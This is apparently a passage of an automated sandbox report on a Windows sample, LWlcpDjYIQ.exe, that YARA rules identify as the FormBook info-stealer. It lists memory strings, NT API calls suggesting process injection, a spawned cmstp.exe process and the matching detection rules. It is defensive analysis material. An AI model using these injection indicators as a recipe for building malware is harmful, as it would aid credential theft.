Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: LWlcpDjYIQ.exe, 00000000.00000002.220096711.00000000007CA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69560 NtWriteFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A69650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_028582E0 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02858260 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02858390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_028581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02858202 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0285838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_004046C3
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_004060D9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 0_2_004068B0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00401026
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00401208
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00408C50
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041C4FE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041CC90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041B55B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00402D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041C76C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041B7C9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_0041BF8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF20A8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A3B090
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF28EC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AFE824
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AE1002
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A2F900
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF22AE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A5EBB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AE03DA
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AEDBD2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF2B28
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A3841F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AED466
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A3D5E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF25DD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A20D20
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF2D07
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF1D55
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF2EF7
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00A46E30
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AED616
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AF1FF1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: 2_2_00AFDFCE
          Source: C:\Windows\explorer.exe Code function: 5_2_06413062
          Source: C:\Windows\explorer.exe Code function: 5_2_0640E8F9
          Source: C:\Windows\explorer.exe Code function: 5_2_064112FF
          Source: C:\Windows\explorer.exe Code function: 5_2_0640F362
          Source: C:\Windows\explorer.exe Code function: 5_2_0640E902
          Source: C:\Windows\explorer.exe Code function: 5_2_06411302
          Source: C:\Windows\explorer.exe Code function: 5_2_064147C7
          Source: C:\Windows\explorer.exe Code function: 5_2_064155B2
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0473D466
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04731002
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0468841F
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_047428EC
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_047420A8
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0468B090
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04741D55
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04670D20
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0467F900
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04742D07
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0468D5E0
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_047425DD
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04696E30
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04742EF7
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_047422AE
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04742B28
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_04741FF1
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0473DBD2
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_046AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02842FB0
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0285C76C
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0285C4FE
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02848C50
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02842D8A
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02842D90
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0285B55B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe Code function: String function: 00A2B150 appears 45 times
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0467B150 appears 35 times
          Source: LWlcpDjYIQ.exe, 00000000.00000003.215702274.000000001EE2F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220134452.0000000002260000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220083689.00000000007B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemsvfw32.dll.muij% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMSTP.EXE` vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256830286.0000000000CAF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
